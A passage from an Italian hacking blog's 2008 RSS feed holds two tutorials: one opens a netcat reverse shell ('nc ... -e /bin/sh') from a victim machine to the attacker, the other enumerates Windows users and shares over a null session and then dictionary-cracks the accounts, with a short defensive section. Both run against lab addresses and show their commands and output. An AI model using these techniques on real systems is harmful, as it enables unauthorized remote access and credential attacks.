'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://twitter.com/home?status=http://www.pillolhacking.net/2008/11/27/comandare-windows-da-remoto-con-psexec/" title="Aggiungi 'Comandare Windows da Remoto con PsExec' a Twitter"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/twitter.png" title="Aggiungi 'Comandare Windows da Remoto con PsExec' a Twitter" alt="Aggiungi 'Comandare Windows da Remoto con PsExec' a Twitter" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.technotizie.it/posta_ok?action=f2&amp;title=Comandare+Windows+da+Remoto+con+PsExec&amp;url=http://www.pillolhacking.net/2008/11/27/comandare-windows-da-remoto-con-psexec/" title="Aggiungi 'Comandare Windows da Remoto con PsExec' a Technotizie"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/technotizie.png" title="Aggiungi 'Comandare Windows da Remoto con PsExec' a Technotizie" alt="Aggiungi 'Comandare Windows da Remoto con PsExec' a Technotizie" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://friendfeed.com/share/bookmarklet/frame#title=Comandare+Windows+da+Remoto+con+PsExec&amp;url=http://www.pillolhacking.net/2008/11/27/comandare-windows-da-remoto-con-psexec/" title="Aggiungi 'Comandare Windows da Remoto con PsExec' a FriendFeed"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/friendfeed.png" title="Aggiungi 'Comandare Windows da Remoto con PsExec' a FriendFeed" alt="Aggiungi 'Comandare Windows da Remoto con PsExec' a FriendFeed" /></a></div>
<!-- Social Bookmarking Reloaded END -->]]></content:encoded>
			<wfw:commentRss>http://www.pillolhacking.net/2008/11/27/comandare-windows-da-remoto-con-psexec/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Back Channel con Netcat</title>
		<link>http://www.pillolhacking.net/2008/11/25/back-channel-con-netcat/</link>
		<comments>http://www.pillolhacking.net/2008/11/25/back-channel-con-netcat/#comments</comments>
		<pubDate>Tue, 25 Nov 2008 13:36:24 +0000</pubDate>
		<dc:creator>Angelo Righi</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Networking]]></category>
		<category><![CDATA[Tutorial]]></category>

		<guid isPermaLink="false">http://www.pillolhacking.net/2008/11/25/back-channel-con-netcat/</guid>
		<description><![CDATA[Abbiamo visto come creare una backdoor con Netcat: si apre una porta Tcp e ci collega la shell di sistema, quindi ci si collega da remoto. Però non sempre le cose vanno così lisce. Per esempio il firewall potrebbe rifiutare tentativi di connessione da fuori. In questo caso per poter prendere il controllo del sistema [...]]]></description>
			<content:encoded><![CDATA[<p>Abbiamo visto <a href="http://www.pillolhacking.net/2008/11/10/creare-una-backdoor-con-netcat/" title="come creare una backdoor con Netcat" id="a-..">come creare una backdoor con Netcat</a>: si apre una porta Tcp e ci collega la shell di sistema, quindi ci si collega da remoto.<br />
Però non sempre le cose vanno così lisce. Per esempio il firewall potrebbe rifiutare tentativi di connessione da fuori.</p>
<p>In questo caso per poter prendere il controllo del sistema si può utilizzare un back-channel. Il back-channel è un canale che parte dalla macchina remota e termina sul nostro computer.Con un back-channel sarà l&#8217;host sotto attacco a collegarsi a noi, e sul nostro computer apparirà la shell del computer remoto.</p>
<p>Per spiegare come fare a utilizzare netcat come back-channel mostro un esempio sfruttando due computer: il computer dell&#8217;hacker su cui gira Windows XP, e la quello della vittima su cui invece è installato Linux Ubuntu.</p>
<p>La macchina dell&#8217;attacker ha l&#8217;indirizzo Ip 192.168.132.1, la vittima 192.168.132.130.</p>
<p>Per prima cosa apro il prompt dei comandi e metto netcat in ascolto sulla porta 9999:</p>
<pre>
C:\Documents and Settings\angelor&gt;nc -l -p 9999 -vv</pre>
<p>l&#8217;opzione -l mette netcat in ascolto, il parametro -p specifica la porta Tcp.</p>
<p>Sull&#8217;altro computer su cui come ho detto gira Linux Ubuntu, digito il seguente comando:</p>
<pre>angelor@daikengo:~$ nc 192.168.132.1 9999 -e /bin/sh -vv</pre>
<p>nei parametri viene specificato l&#8217;Ip del computer dell&#8217;attacker (192.168.132.1) e la porta; con l&#8217;opzione -e si esegue la shell di sistema /bin/sh. Però l&#8217;output verrà indirizzato sul canale aperto Tcp aperto con l&#8217;altro computer e non in locale:</p>
<pre>(UNKNOWN) [192.168.132.1] 9999 (?) open</pre>
<p>questo messaggio indica che il computer dell&#8217;hacker ha accettato la connessione. Dall&#8217;altra parte, sul computer dell&#8217;hacker:</p>
<pre>192.168.132.130: inverse host lookup failed: h_errno 11004: NO_DATA

connect to [192.168.132.1] from (UNKNOWN) [192.168.132.130] 36156: NO_DATA</pre>
<p>questo indica che il computer remoto (Ubuntu, 192.168.132.130) ha aperto una connessione verso questo computer. A questo punto non rimane che digitare comandi: comandi Linux naturalmente!</p>
<pre>
wUSER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
angelor  pts/0    :0.0             22:15   23.00s  0.32s  0.00s sh

uname -a
Linux daikengo 2.6.24-19-generic #1 SMP Wed Jun 18 22:43:41 UTC 2008 i686 GNU/Linux

ls / -al
drwxr-xr-x  21 root root  4096 2008-08-24 17:52 .
drwxr-xr-x  21 root root  4096 2008-08-24 17:52 ..
drwxr-xr-x   2 root root  4096 2008-08-24 17:53 bin
drwxr-xr-x   3 root root  4096 2008-08-24 17:52 boot
lrwxrwxrwx   1 root root    11 2008-08-24 17:43 cdrom -&gt; media/cdrom
drwxr-xr-x  10 root root 13700 2008-11-25 10:14 dev
drwxr-xr-x 120 root root  4096 2008-11-25 10:15 etc
drwxr-xr-x   3 root root  4096 2008-08-24 17:48 home
drwxr-xr-x   2 root root  4096 2008-07-02 12:16 initrd
lrwxrwxrwx   1 root root    33 2008-08-24 17:52 initrd.img -&gt; boot/initrd.img-2.6.24-19-generic
drwxr-xr-x  16 root root  4096 2008-08-24 17:53 lib
drwx------   2 root root 16384 2008-08-24 17:43 lost+found
drwxr-xr-x   4 root root  4096 2008-07-02 12:16 media
drwxr-xr-x   2 root root  4096 2008-04-15 07:53 mnt
drwxr-xr-x   2 root root  4096 2008-07-02 12:16 opt
dr-xr-xr-x 116 root root     0 2008-11-25 10:13 proc
drwxr-xr-x   3 root root  4096 2008-08-24 17:52 root
drwxr-xr-x   2 root root  4096 2008-08-24 17:53 sbin
drwxr-xr-x   2 root root  4096 2008-07-02 12:16 srv
drwxr-xr-x  12 root root     0 2008-11-25 10:13 sys
drwxrwxrwt  13 root root  4096 2008-11-25 10:19 tmp
drwxr-xr-x  11 root root  4096 2008-07-02 12:18 usr
drwxr-xr-x  15 root root  4096 2008-07-02 12:34 var
lrwxrwxrwx   1 root root    30 2008-08-24 17:52 vmlinuz -&gt; boot/vmlinuz-2.6.24-19-generic</pre>
<p>Naturalmente tutto questo funziona se il firewall permette connessioni in uscita (in genere lo permette).</p>
<p>Questo articolo fa parte della serie &#8220;<a href="http://www.pillolhacking.net/2008/09/26/le-sette-vite-di-netcat/" id="y459" title="Le 7 Vite di Netcat">Le 7 Vite di Netcat</a>&#8220;. Potrai trovare altre informazioni su Netcat negli altri articoli della serie:</p>
<ul>
<li><a href="http://www.pillolhacking.net/2008/10/02/leggere-gli-header-http-e-le-pagine-web-con-netcat/" title="Leggere gli header HTTP e le pagine Web con Netcat" id="p1mn">Leggere gli header HTTP e le pagine Web con Netcat</a></li>
</ul>
<ul>
<li>  <a href="http://www.pillolhacking.net/2008/10/07/leggere-la-posta-elettronica-con-netcat/" title="Leggere la posta elettronica con Netcat" id="c6sn">Leggere la posta elettronica con Netcat</a></li>
</ul>
<ul>
<li>  <a href="http://www.pillolhacking.net/2008/10/20/inviare-email-con-netcat/" title="Inviare email con Netcat" id="ikhx">Inviare email con Netcat</a></li>
</ul>
<ul>
<li>  <a href="http://www.pillolhacking.net/2008/10/24/netcat-come-scanner/" title="Netcat come scanner" id="ar3p">Netcat come scanner</a></li>
</ul>
<ul>
<li>  <a href="http://www.pillolhacking.net/2008/11/06/trasferire-file-con-netcat/" title="Trasferire file con Netcat" id="bkqz">Trasferire file con Netcat</a></li>
</ul>
<ul>
<li>  <a href="http://www.pillolhacking.net/2008/11/10/creare-una-backdoor-con-netcat/" title="Creare una backdoor con Netcat" id="h:vr">Creare una backdoor con Netcat</a></li>
</ul>
<ul>
<li>  Back Channel con Netcat</li>
</ul>
<!-- Social Bookmarking Reloaded BEGIN --><div class="social_bookmark"><em>Segnala presso:</em><br /><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://del.icio.us/post?url=http://www.pillolhacking.net/2008/11/25/back-channel-con-netcat/&amp;title=Back+Channel+con+Netcat" title="Aggiungi 'Back Channel con Netcat' a Del.icio.us"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/delicious.png" title="Aggiungi 'Back Channel con Netcat' a Del.icio.us" alt="Aggiungi 'Back Channel con Netcat' a Del.icio.us" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://digg.com/submit?phase=2&amp;url=http://www.pillolhacking.net/2008/11/25/back-channel-con-netcat/&amp;title=Back+Channel+con+Netcat" title="Aggiungi 'Back Channel con Netcat' a digg"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/digg.png" title="Aggiungi 'Back Channel con Netcat' a digg" alt="Aggiungi 'Back Channel con Netcat' a digg" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.technorati.com/faves?add=http://www.pillolhacking.net/2008/11/25/back-channel-con-netcat/" title="Aggiungi 'Back Channel con Netcat' a Technorati"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/technorati.png" title="Aggiungi 'Back Channel con Netcat' a Technorati" alt="Aggiungi 'Back Channel con Netcat' a Technorati" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.google.com/bookmarks/mark?op=edit&amp;output=popup&amp;bkmk=http://www.pillolhacking.net/2008/11/25/back-channel-con-netcat/&amp;title=Back+Channel+con+Netcat" title="Aggiungi 'Back Channel con Netcat' a Google Bookmarks"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/google.png" title="Aggiungi 'Back Channel con Netcat' a Google Bookmarks" alt="Aggiungi 'Back Channel con Netcat' a Google Bookmarks" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://segnalo.alice.it/post.html.php?url=http://www.pillolhacking.net/2008/11/25/back-channel-con-netcat/&amp;title=Back+Channel+con+Netcat" title="Aggiungi 'Back Channel con Netcat' a Segnalo"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/segnalo.png" title="Aggiungi 'Back Channel con Netcat' a Segnalo" alt="Aggiungi 'Back Channel con Netcat' a Segnalo" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://oknotizie.alice.it/post?url=http://www.pillolhacking.net/2008/11/25/back-channel-con-netcat/&amp;title=Back+Channel+con+Netcat" title="Aggiungi 'Back Channel con Netcat' a OKnotizie"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/oknotizie.gif" title="Aggiungi 'Back Channel con Netcat' a OKnotizie" alt="Aggiungi 'Back Channel con Netcat' a OKnotizie" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.diggita.it/submit.php?title=Back+Channel+con+Netcat&amp;url=http://www.pillolhacking.net/2008/11/25/back-channel-con-netcat/" title="Aggiungi 'Back Channel con Netcat' a Diggita"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/diggita.png" title="Aggiungi 'Back Channel con Netcat' a Diggita" alt="Aggiungi 'Back Channel con Netcat' a Diggita" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.facebook.com/share.php?u=http://www.pillolhacking.net/2008/11/25/back-channel-con-netcat/&amp;t=Back+Channel+con+Netcat" title="Aggiungi 'Back Channel con Netcat' a FaceBook"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/facebook.png" title="Aggiungi 'Back Channel con Netcat' a FaceBook" alt="Aggiungi 'Back Channel con Netcat' a FaceBook" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.upnews.it/submit?url=http://www.pillolhacking.net/2008/11/25/back-channel-con-netcat/&amp;title=Back+Channel+con+Netcat" title="Aggiungi 'Back Channel con Netcat' a Upnews"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/upnews.png" title="Aggiungi 'Back Channel con Netcat' a Upnews" alt="Aggiungi 'Back Channel con Netcat' a Upnews" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://notizieflash.com/submit.php?title=Back+Channel+con+Netcat&amp;url=http://www.pillolhacking.net/2008/11/25/back-channel-con-netcat/" title="Aggiungi 'Back Channel con Netcat' a NotizieFlash"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/notizieflash.png" title="Aggiungi 'Back Channel con Netcat' a NotizieFlash" alt="Aggiungi 'Back Channel con Netcat' a NotizieFlash" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://twitter.com/home?status=http://www.pillolhacking.net/2008/11/25/back-channel-con-netcat/" title="Aggiungi 'Back Channel con Netcat' a Twitter"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/twitter.png" title="Aggiungi 'Back Channel con Netcat' a Twitter" alt="Aggiungi 'Back Channel con Netcat' a Twitter" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.technotizie.it/posta_ok?action=f2&amp;title=Back+Channel+con+Netcat&amp;url=http://www.pillolhacking.net/2008/11/25/back-channel-con-netcat/" title="Aggiungi 'Back Channel con Netcat' a Technotizie"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/technotizie.png" title="Aggiungi 'Back Channel con Netcat' a Technotizie" alt="Aggiungi 'Back Channel con Netcat' a Technotizie" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://friendfeed.com/share/bookmarklet/frame#title=Back+Channel+con+Netcat&amp;url=http://www.pillolhacking.net/2008/11/25/back-channel-con-netcat/" title="Aggiungi 'Back Channel con Netcat' a FriendFeed"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/friendfeed.png" title="Aggiungi 'Back Channel con Netcat' a FriendFeed" alt="Aggiungi 'Back Channel con Netcat' a FriendFeed" /></a></div>
<!-- Social Bookmarking Reloaded END -->]]></content:encoded>
			<wfw:commentRss>http://www.pillolhacking.net/2008/11/25/back-channel-con-netcat/feed/</wfw:commentRss>
		<slash:comments>13</slash:comments>
		</item>
		<item>
		<title>Attaccare Windows con la Null Session</title>
		<link>http://www.pillolhacking.net/2008/11/17/attaccare-windows-con-la-null-session/</link>
		<comments>http://www.pillolhacking.net/2008/11/17/attaccare-windows-con-la-null-session/#comments</comments>
		<pubDate>Mon, 17 Nov 2008 12:04:25 +0000</pubDate>
		<dc:creator>Angelo Righi</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Networking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://www.pillolhacking.net/2008/11/17/attaccare-windows-con-la-null-session/</guid>
		<description><![CDATA[La Null Session è una sessione che permette di interagire con un sistema Windows senza dover effettuare l&#8217;autenticazione. Tramite la Null Session è possibile ottenere informazioni sul sistema, come l&#8217;elenco delle condivisioni e l&#8217;elenco degli utenti. Ottenere l&#8217;elenco delle condivisioni può permettere un&#8217;intrusione semplice. Le condivisioni potrebbero non essere protette da password, nel qual caso [...]]]></description>
			<content:encoded><![CDATA[<p>La Null Session è una sessione che permette di interagire con un sistema Windows senza dover effettuare l&#8217;autenticazione. Tramite la Null Session è possibile ottenere informazioni sul sistema, come l&#8217;elenco delle condivisioni e l&#8217;elenco degli utenti.</p>
<p>Ottenere l&#8217;elenco delle condivisioni può permettere un&#8217;intrusione semplice. Le condivisioni potrebbero <a href="http://www.pillolhacking.net/2008/10/22/sei-sicuro-che-ti-serve-la-password/ ">non essere protette da password</a>, nel qual caso si potrebbe accedere a informazioni importanti. Potrebbero anche esserci condivisioni attivate alla scrittura, eventualità che permetterebbe all&#8217;hacker di infiltrare un trojan nella cartella dell&#8217;esecuzione automatica.</p>
<p>Con l&#8217;elenco degli utenti si potrebbe tentare un attacco a dizionario, testando una lista di password contro ogni utente valido.</p>
<p>Infine le informazioni potrebbero essere utilizzate come leva per ottenere la fiducia di un impiegato in un attacco di social-engineering.</p>
<p><strong>Creare la Null Session</strong></p>
<p>Se provassimo a visualizzare le risorse di un computer senza effettuare una Null Session otterremmo un errore di accesso negato:</p>
<pre>
net view \\127.0.0.1</pre>
<p>Per creare una Null Session bisogna utilizzare il comando net use, specificare l&#8217;indirizzo del computer, invocare la risorsa IPC$ e fornire credenziali nulle:</p>
<pre>
C:\Documents and Settings\angelor&gt;net use \\127.0.0.1\IPC$ "" /u:""</pre>
<p>Se il computer remoto accetta la Null Session, otterremo questo messaggio eseguendo net use senza parametri:</p>
<pre>
C:\Documents and Settings\angelor&gt;net use
Stato       Locale     Remota                    Rete
-------------------------------------------------------------------------------
OK                     \\127.0.0.1\IPC$          Rete di Microsoft Windows
Esecuzione comando riuscita.</pre>
<p>A questo punto net view visualizzerà l&#8217;eventuale lista di risorse (non quelle nascoste però).</p>
<p><strong>Sfruttare la Null Session</strong></p>
<p>Per facilitare l&#8217;interazione con la Null Session sono stati creati diversi tools. Alcuni tra questi sono enum, winfo e hunt. Con questi strumenti è possibile ottenere liste di utenti, risorse condivise (anche nascoste) e altre informazioni (come le policy delle password o la versione del sistema operativo) tramite Null Session. Vediamo nel dettaglio.</p>
<p>Sia <strong><a href="http://packetstormsecurity.org/NT/audit/ForensicToolkit14.exe" title="hunt" id="qmo-">hunt</a> </strong>che <strong><a href="http://packetstormsecurity.org/NT/audit/winfo.exe" title="winfo" id="lh:w">winfo</a> </strong>sono molto semplici da usare: bisogna invocare il comando da linea di comando specificando l&#8217;indirizzo Ip (nel formato preceduto da \\ se si utilizza hunt). Winfo permette di specificare se creare una Null Session prima di tentare il recupero delle informazioni.</p>
<p>Uno strumento a mio parere più potente è <strong><a href="http://packetstormsecurity.org/advisories/bindview/enum.tar.gz" title="enum" id="gk9q">enum</a>. </strong>Oltre ad avere più opzioni rispetto agli altri due, conesente anche un attacco a dizionario.</p>
<p>Ecco la lista delle opzioni di enum:</p>
<pre>
usage:  enum  [switches]  [hostname|ip]
-U:  get userlist
-M:  get machine list
-N:  get namelist dump (different from -U|-M)
-S:  get sharelist
-P:  get password policy information
-G:  get group and member list
-L:  get LSA policy information
-D:  dictionary crack, needs -u and -f
-d:  be detailed, applies to -U and -S
-c:  don't cancel sessions
-u:  specify username to use (default "")
-p:  specify password to use (default "")
-f:  specify dictfile to use (wants -D)</pre>
<p>e un esempio con obiettivo Windows XP:</p>
<pre>
enum  -UMNSPGL 192.168.132.128
server: 192.168.132.128
setting up session... success.
password policy:
min length: none
min age: none
max age: 42 days
lockout threshold: none
lockout duration: 30 mins
lockout reset: 30 mins
opening lsa policy... success.
server role: 3 [primary (unknown)]
names:
netbios: TEST
domain: WORKGROUP
quota:
paged pool limit: 33554432
non paged pool limit: 1048576
min work set size: 65536
max work set size: 251658240
pagefile limit: 0
time limit: 0
trusted domains:
indeterminate
netlogon done by a PDC server
getting namelist (pass 1)... got 4, 0 left:
Administrator  Guest  HelpAssistant  SUPPORT_328945a3
getting user list (pass 1, index 0)... success, got 4.
Administrator  Guest  HelpAssistant  SUPPORT_328945a3
enumerating shares (pass 1)... got 3 shares, 0 left:
IPC$  ADMIN$  C$
getting machine list (pass 1, index 0)... success, got 0.
Group: Administrators
TEST\Administrator
Group: Backup Operators
Group: Guests
TEST\Guest
Group: Network Configuration Operators
Group: Power Users
Group: Replicator
Group: Users
NT AUTHORITY\INTERACTIVE
NT AUTHORITY\Authenticated Users
Group: Utenti desktop remoto
Group: HelpServicesGroup
TEST\SUPPORT_328945a3
cleaning up... success.</pre>
<p>In questo esempio<strong> </strong>riusciamo ad ottenere la lista delle condivisioni (tutte nascoste in questo caso): IPC$,ADMIN$ e C$ e una lista di utenti, ovvero Administrator,Guest,HelpAssistant e SUPPORT_328945a3.</p>
<p>Utilizzando l&#8217;opzione D (dictionary crack, con -u per specificare l&#8217;utente e -f per specificare il dizionrio da usare) è possibile ottenere l&#8217;accesso e quindi &#8220;montare&#8221; in locale il disco C$ della macchina da attaccare:</p>
<pre>
net use H: \\192.168.132.128\C$</pre>
<p>Per chi fosse alla ricerca di dizionari da utilizzare in attacchi di questo tipo consiglio questo indirizzo: <a href="http://packetstormsecurity.org/Crackers/wordlists/" title="http://packetstormsecurity.org/Crackers/wordlists/" id="fhv4">http://packetstormsecurity.org/Crackers/wordlists/</a></p>
<p><strong>Come Difendersi</strong></p>
<p>I sistemi operativi Microsoft attualmente diffusi per default non mostrano la lista degli utenti. Per controllare, attivare o disabilitare la Null Session su Xp e Window 2003 è possibile utilizzare l&#8217;interfaccia grafica secpol.msc, da invocare da Start -&gt; Esegui (o tasto Windows + R).</p>
<p>Le voci interessate sono le seguenti:</p>
<p>Criteri Local -&gt; Opzioni di protezione</p>
<p>Accesso di rete: non consentire l&#8217;enumerazione anonima degli account SAM<br />
Accesso di rete: non consentire l&#8217;enumerazione anonima di account e condivisioni SAM</p>
<p>Attivando entrambe le voci gli utenti anonimi (ovvero con credenziali nulle) non saranno in grado di elencare gli utenti e neppure la lista delle risorse condivise, riducendo notevolmente la superficie di attacco per un pirata.</p>
<p>Le porte Tcp/Udp coinvolte in questo attacco sono le seguenti: 135,137,138,139,445. Filtrarle con un personal firewall, perlomeno sull&#8217;interfaccia esposta a Internet può mitigare il pericolo e neutralizzare questo tipo d&#8217;attacco.</p>
<p>L&#8217;attacco Null Session è sicuramente uno dei più antichi attacchi per Windows, nel passato ha fatto molte vittime. Le policy di sicurezza standard delle ultime versioni di Windows (da XP Professional a Vista, Windows 2003 compreso) rendono questo attacco meno diffuso. Ma non è detto che non si trovino configurazioni deboli.</p>
<!-- Social Bookmarking Reloaded BEGIN --><div class="social_bookmark"><em>Segnala presso:</em><br /><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://del.icio.us/post?url=http://www.pillolhacking.net/2008/11/17/attaccare-windows-con-la-null-session/&amp;title=Attaccare+Windows+con+la+Null+Session" title="Aggiungi 'Attaccare Windows con la Null Session' a Del.icio.us"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/delicious.png" title="Aggiungi 'Attaccare Windows con la Null Session' a Del.icio.us" alt="Aggiungi 'Attaccare Windows con la Null Session' a Del.icio.us" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://digg.com/submit?phase=2&amp;url=http://www.pillolhacking.net/2008/11/17/attaccare-windows-con-la-null-session/&amp;title=Attaccare+Windows+con+la+Null+Session" title="Aggiungi 'Attaccare Windows con la Null Session' a digg"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/digg.png" title="Aggiungi 'Attaccare Windows con la Null Session' a digg" alt="Aggiungi 'Attaccare Windows con la Null Session' a digg" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.technorati.com/faves?add=http://www.pillolhacking.net/2008/11/17/attaccare-windows-con-la-null-session/" title="Aggiungi 'Attaccare Windows con la Null Session' a Technorati"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/technorati.png" title="Aggiungi 'Attaccare Windows con la Null Session' a Technorati" alt="Aggiungi 'Attaccare Windows con la Null Session' a Technorati" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.google.com/bookmarks/mark?op=edit&amp;output=popup&amp;bkmk=http://www.pillolhacking.net/2008/11/17/attaccare-windows-con-la-null-session/&amp;title=Attaccare+Windows+con+la+Null+Session" title="Aggiungi 'Attaccare Windows con la Null Session' a Google Bookmarks"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/google.png" title="Aggiungi 'Attaccare Windows con la Null Session' a Google Bookmarks" alt="Aggiungi 'Attaccare Windows con la Null Session' a Google Bookmarks" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://segnalo.alice.it/post.html.php?url=http://www.pillolhacking.net/2008/11/17/attaccare-windows-con-la-null-session/&amp;title=Attaccare+Windows+con+la+Null+Session" title="Aggiungi 'Attaccare Windows con la Null Session' a Segnalo"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/segnalo.png" title="Aggiungi 'Attaccare Windows con la Null Session' a Segnalo" alt="Aggiungi 'Attaccare Windows con la Null Session' a Segnalo" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://oknotizie.alice.it/post?url=http://www.pillolhacking.net/2008/11/17/attaccare-windows-con-la-null-session/&amp;title=Attaccare+Windows+con+la+Null+Session" title="Aggiungi 'Attaccare Windows con la Null Session' a OKnotizie"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/oknotizie.gif" title="Aggiungi 'Attaccare Windows con la Null Session' a OKnotizie" alt="Aggiungi 'Attaccare Windows con la Null Session' a OKnotizie" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.diggita.it/submit.php?title=Attaccare+Windows+con+la+Null+Session&amp;url=http://www.pillolhacking.net/2008/11/17/attaccare-windows-con-la-null-session/" title="Aggiungi 'Attaccare Windows con la Null Session' a Diggita"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/diggita.png" title="Aggiungi 'Attaccare Windows con la Null Session' a Diggita" alt="Aggiungi 'Attaccare Windows con la Null Session' a Diggita" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.facebook.com/share.php?u=http://www.pillolhacking.net/2008/11/17/attaccare-windows-con-la-null-session/&amp;t=Attaccare+Windows+con+la+Null+Session" title="Aggiungi 'Attaccare Windows con la Null Session' a FaceBook"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/facebook.png" title="Aggiungi 'Attaccare Windows con la Null Session' a FaceBook" alt="Aggiungi 'Attaccare Windows con la Null Session' a FaceBook" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.upnews.it/submit?url=http://www.pillolhacking.net/2008/11/17/attaccare-windows-con-la-null-session/&amp;title=Attaccare+Windows+con+la+Null+Session" title="Aggiungi 'Attaccare Windows con la Null Session' a Upnews"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/upnews.png" title="Aggiungi 'Attaccare Windows con la Null Session' a Upnews" alt="Aggiungi 'Attaccare Windows con la Null Session' a Upnews" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://notizieflash.com/submit.php?title=Attaccare+Windows+con+la+Null+Session&amp;url=http://www.pillolhacking.net/2008/11/17/attaccare-windows-con-la-null-session/" title="Aggiungi 'Attaccare Windows con la Null Session' a NotizieFlash"><img 